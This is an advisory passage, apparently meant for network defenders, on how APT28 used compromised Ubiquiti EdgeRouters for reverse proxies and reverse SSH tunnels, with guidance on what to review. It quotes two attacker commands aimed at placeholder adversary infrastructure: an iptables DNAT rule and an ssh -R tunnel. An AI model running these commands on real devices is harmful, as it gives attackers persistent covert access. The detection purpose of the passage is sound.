Proxy and Tunnel. Ubiquiti's Unofficial Features
APT28 actors have been using compromised Ubiquiti EdgeRouters to establish proxy connections and reverse SSH tunnels to their dedicated infrastructure. This allows them to maintain persistent access and control over the compromised devices, even after password changes or other mitigation attempts.
Reverse Proxy Connections
APT28 actors have utilized iptables rules on EdgeRouters to establish reverse proxy connections to their dedicated infrastructure. Network defenders and users can review iptables chains and Bash histories on EdgeRouters for unusual invocations, such as the following example:
iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>:10081
This iptables rule redirects incoming traffic on port 4443 of the EdgeRouter to the APT28 dedicated infrastructure on port 10081, effectively creating a reverse proxy connection.
Reverse SSH Tunnels
Additionally, APT28 actors have uploaded adversary controlled SSH RSA keys to compromised EdgeRouters to establish reverse SSH tunnels. These tunnels allow the actors to access the compromised devices, even after password changes or other mitigation attempts.
Network defenders and users can review the following directories on EdgeRouters for unknown RSA keys:
/root/.ssh/
/home/<user>/.ssh/
The presence of unknown RSA keys in these directories may indicate that adversaries have used them to access the EdgeRouters, bypassing password authentication.
Furthermore, network defenders can query network traffic logs on EdgeRouters to identify abnormal SSH sessions. An invocation of a reverse SSH tunnel used by APT28 actors is provided below:
ssh –i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>
This command establishes a reverse SSH tunnel from the EdgeRouter to the APT28 infrastructure, allowing the actors to maintain remote access and control over the compromised device.